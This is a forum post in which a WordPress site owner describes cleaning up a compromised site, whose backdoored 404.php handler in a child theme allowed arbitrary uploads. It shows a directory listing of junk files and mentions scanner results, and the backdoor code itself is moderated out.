adamprato

I see how dumb a move that is now ??

Kimmo and I found the root cause of the problem. The problem was a bogus 404.php in the child theme. The 404 handler was providing people with a means to upload arbitrary files.

<?php
… [code moderated]...';
}
;?>

I'll submit this and all of the new backdoors wordfence didn't find to wordfence support.

Okay, so there’s a TON of stuff wordfence isn’t finding. The public_html is littered with junk, relatively new. People seem to be uploading stuff via this thing: dl-nagano-vodki-naidu-skachat-320-kbit

That wasn’t there in a previous version of the site but, whatever. I have more things to clean up for now. At this point I can’t ask why this is happening because the entire site is littered with crap.

Just a small sample of the directory listing showing the new problem (not related to the original topic):

sftp> cd public_html
sftp> ls
-_IqRMleiPw.jpg
00074.MTS
00075.MTS
03c3b473d21abf2552da82e5faea60bd
07.jpg
1291360193_E5EBEAE020EDE020EAF0E0F1EDEEEC20F4EEEDE5.jpg
131_Ardinvest– (1).m3u
139
1419884578486.jpg
2014-12-13 12.56.44.jpg
20141226_152525.jpg
224895558398_01432f433c05e0cae01b2ab08b37a9ba.jpg
228.php
23.docx

All I know is that there’s something wordfence isn’t finding that put that download script in place.

If anyone is interested, I’m backing up the site before I go on a mass cleanse.

Okay, thanks for pointing that out Kimmo.

Dan, I’ll look into changing that as well. No sense in spamming the access logs unnecesarily.

Tim, I removed 70+ backdoors by hand. Then I installed Wordfence and found one last backdoor I hadn’t known about (I didn’t know about the preg() obfuscation until then).I’ve run the sucuri scanner and wpscan, and we have the pro version of wordfence that does external checks as well.

Kimmo, I’ll look through the logs again and try to piece together when these things appeared.